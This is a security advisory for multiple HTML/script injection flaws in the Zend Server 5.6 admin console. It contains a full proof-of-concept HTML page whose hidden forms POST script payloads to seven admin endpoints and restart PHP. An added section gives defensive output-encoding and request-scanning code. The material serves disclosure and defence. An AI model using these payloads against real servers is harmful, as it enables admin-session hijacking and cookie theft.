Zend Server Multiple HTML Code Injection Vulnerabilities
Release date: 2012-03-10
Last updated: 2012-03-13
Affected systems:
Zend Zend Server 5.6
Unaffected systems:
Zend Optimizer+
Zend Zend Server 5.6.0 SP1 0
Description:
BUGTRAQ ID: 52397
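Zend is a PHP company founded in 1999 that has released a series of key PHP web application platform products and services.
Zend Server 5.6.0 has multiple HTML injection vulnerabilities in its handling of several parameters. Successful exploitation allows an attacker to execute arbitrary HTML and script code in the affected browser, steal cookie-based authentication credentials, and control the appearance of the site.
<*Source: LiquidWorm
Link: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5078.php
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!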
<html>
<title>Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities</title>
<link rel="Shortcut Icon" href="http://zeroscience.mk/favicon.ico" type="image/x-icon">
<body bgcolor="#1C1C1C"><br />
<img style="margin-left:10" src="http://zeroscience.mk/images/zsl-logo1.png" height="20%" width="20%">
<script type="text/javascript">
var disclaimer = "This document and all the information it contains are provided \"as is\",\n" +
"for educational purposes only, without warranty of any kind, whether\n" +
"express or implied.\n\n" +
"The author reserves the right not to be responsible for the topicality,\n" +
"correctness, completeness or quality of the information provided in\n" +
"this document. Liability claims regarding damage caused by the use of\n" +
"any information provided, including any kind of information which is\n" +
"incomplete or incorrect, will therefore be rejected.";
var answ = confirm(disclaimer);
if (answ == true){}else{window.location.href = "http://www.zend.com";}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
function xss6(){document.forms["xss6"].submit();}
function xss7(){document.forms["xss7"].submit();}
function rst(){document.forms["rst"].submit();}
</script>
<center><h2 style="position:absolute;left:525;top:32;background-color:#BAB8B9;width:200">
HTML Response:</h2></center>
<iframe src="http://www.zeroscience.mk/codes/zend_s03.txt" width="1100" height="700"
name="ZSL_iframe" align="top" frameborder="0" style="position:absolute;left:525;
top:80;background-color:#cecece;"></iframe>
<font color="#414141" size="2" style="position:absolute;top:795px;right:55px">v0.3</font>
<br />
<form action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBPcHRpbWl6ZXIr"
enctype="application/x-www-form-urlencoded" method="POST" id="xss1" target="ZSL_iframe">
<input type="hidden" name="trgtAction" value="Search" />
<input type="hidden" name="searchName" value='ext:Zend Optimizer+' />
<input type="hidden" name='directives[zend_optimizerplus.blacklist_filename]' value='"><script>alert(1);</script>' />
</form>
<form action="http://localhost:10081/ZendServer/Code-Tracing/Generate-Dump"
enctype="application/x-www-form-urlencoded" method="POST" id="xss2" target="ZSL_iframe">
<input type="hidden" name="traceUrl" value='"><script>alert("ZSL");</script>' />
</form>
<form action="http://localhost:10081/ZendServer/Page-Cache/Save-Rule"
enctype="application/x-www-form-urlencoded" method="POST" id="xss3" target="ZSL_iframe">
<input type="hidden" name="compression" value="1" />
<input type="hidden" name="host" value='"><script>alert(1);</script>' />
<input type="hidden" name="lifetime" value="11" />
<input type="hidden" name="matchConditions" value="ALL" />
<input type="hidden" name="name" value='"><script>alert(2);</script>' />
<input type="hidden" name="path" value='"><script>alert(3);</script>' />
<input type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionMatch]' value="1" />
<input type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionType]' value="equals" />
<input type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionValue]' value="1" />
<input type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionVar]' value="_GET" />
<input type="hidden" name="schema" value="http" />
<input type="hidden" name="type" value="exact" />
</form>
<form action="http://localhost:10081/ZendServer/Job-Queue-Scheduling/Save-Rule"
enctype="application/x-www-form-urlencoded" method="POST" id="xss4" target="ZSL_iframe">
<input type="hidden" name="ruleId" value="" />
<input type="hidden" name="ruleName" value='"><script>alert("ZSL");</script>' />
<input type="hidden" name="ruleUrl" value="http://www.zeroscience.mk" />
<input type="hidden" name="scheduleDailyTime" value="" />
<input type="hidden" name="scheduleEvery" value="schedule-every-hours" />
<input type="hidden" name="scheduleEveryHours" value="1" />
<input type="hidden" name="scheduleEveryMinutes" value="" />
<input type="hidden" name="scheduleHourlyMinute" value="" />
<input type="hidden" name="scheduleMonthlyDay" value="" />
<input type="hidden" name="scheduleMonthlyTime" value="" />
<input type="hidden" name="scheduleType" value="schedule-every" />
<input type="hidden" name="scheduleWeeklyTime" value="" />
</form>
<form action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBKYXZhIEJyaWRnZQ%3D%3D"
enctype="application/x-www-form-urlencoded" method="POST" id="xss5" target="ZSL_iframe">
<input type="hidden" name="trgtAction" value="Search" />
<input type="hidden" name="searchName" value='ext:Zend Java Bridge' />
<input type="hidden" name="directives[zend_jbridge.encoding]" value='"><script>alert(1);</script>' />
</form>
<form action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBEZWJ1Z2dlcg%3D%3D"
enctype="application/x-www-form-urlencoded" method="POST" id="xss6" target="ZSL_iframe">
<input type="hidden" name="trgtAction" value="Search" />
<input type="hidden" name="searchName" value='ext:Zend Debugger' />
<input type="hidden" name="directives[zend_debugger.allow_hosts]" value='"><script>alert(1);</script>' />
<input type="hidden" name="directives[zend_debugger.deny_hosts]" value='"><script>alert(2);</script>' />
</form>
<form action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBPcHRpbWl6ZXIr"
enctype="application/x-www-form-urlencoded" method="POST" id="xss7" target="ZSL_iframe">
<input type="hidden" name="trgtAction" value="Search" />
<input type="hidden" name="searchName" value='ext:Zend Code Tracing' />
<input type="hidden" name='directives[zend_codetracing.log_file]' value='"><script>alert(1);</script>' />
</form>
<form action="http://localhost:10081/ZendServer/Configuration/Webserver-Restart"
enctype="application/x-www-form-urlencoded" method="POST" id="rst" target="ZSL_iframe">
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="1. XSS POST Injection --> 'directives[zend_optimizerplus.blacklist_filename]'" onClick="xss1()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="2. XSS POST Injection --> 'traceUrl'" onClick="xss2()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="3. XSS POST Injection --> 'host', 'name', 'path'" onClick="xss3()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="4. XSS POST Injection --> 'ruleName'" onClick="xss4()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="5. XSS POST Injection --> 'directives[zend_jbridge.encoding]'" onClick="xss5()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="6. XSS POST Injection --> 'directives[zend_debugger.allow_hosts]'" onClick="xss6()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="7. XSS POST Injection --> 'directives[zend_codetracing.log_file]'" onClick="xss7()" />
<br /><br /><br /><br />
<input type="button"
style="color:white;background-color:#c05c5c;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:5;padding-bottom:5;margin-left:10"
value="8. Restart PHP" onClick="rst()" />
<br /><br />
<br /><br />
<font color="gray" size="2" style="margin-left:10">© 2012. <a href="http://www.zeroscience.mk"
target="_blank" style="text-decoration:none"><font color="gray">Zero Science Lab</font></a><br />
<font style="margin-left:10">Macedonian Information Security Research And Development Laboratory</font>
<br /><font style="margin-left:10">
Proof of Concept (PoC) code for advisory ID:
<a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5078.php" target="ZSL_iframe"
style="text-decoration:none"><font color="gray">ZSL-2012-5078</font></a></font>
</font></form>
</body></html>
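Recommendation:
Vendor patch:
Zend
----
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page: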
http://www.zend.com/downloads
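Where the upgrade cannot be applied immediately, the following added example (not part of the original advisory and not Zend's code) shows the output encoding that neutralizes the injected values, plus a heuristic check for POST bodies sent to the Zend Server admin interface. The parameter names are the ones exercised by the PoC above; `renderUnsafe`, `renderSafe`, `escapeHtml` and `findSuspectParams` are hypothetical helpers, the markup they emit is an assumed model of how a value reaches the page, and the sample bodies are constructed.

```javascript
// Added example: parameter names come from the PoC; everything else is illustrative.
const WATCHED = [
  /^directives\[[^\]]+\]$/,   // Directives/Save: directives[...]
  /^traceUrl$/,               // Code-Tracing/Generate-Dump
  /^(host|name|path)$/,       // Page-Cache/Save-Rule
  /^ruleName$/,               // Job-Queue-Scheduling/Save-Rule
];

// Encode a value for use inside a quoted HTML attribute or element text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Assumed vulnerable pattern: the submitted value is concatenated unencoded.
function renderUnsafe(name, value) {
  return `<input type="text" name="${name}" value="${value}" />`;
}

// Hardened pattern: same markup, name and value encoded at output time.
function renderSafe(name, value) {
  return `<input type="text" name="${escapeHtml(name)}" value="${escapeHtml(value)}" />`;
}

// Scan an application/x-www-form-urlencoded body and return the watched
// parameters whose values contain characters that can break out of an attribute.
function findSuspectParams(body) {
  const hits = [];
  for (const [name, value] of new URLSearchParams(body)) {
    if (WATCHED.some((re) => re.test(name)) && /[<>"']/.test(value)) {
      hits.push(name);
    }
  }
  return hits;
}

// Constructed sample bodies (not captured traffic).
const benignBody = 'ruleName=nightly-report&ruleUrl=http%3A%2F%2Fexample.test%2Fjob.php';
const markupBody = new URLSearchParams({
  trgtAction: 'Search',
  'directives[zend_debugger.allow_hosts]': '"><b>x</b>',
  'directives[zend_debugger.deny_hosts]': '10.0.0.1',
}).toString();

console.log(findSuspectParams(benignBody), findSuspectParams(markupBody));
console.log(renderSafe('host', '"><b>x</b>'));
```

The scanner is a triage heuristic for proxy or access logs; encoding at output time is what actually removes the injection.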
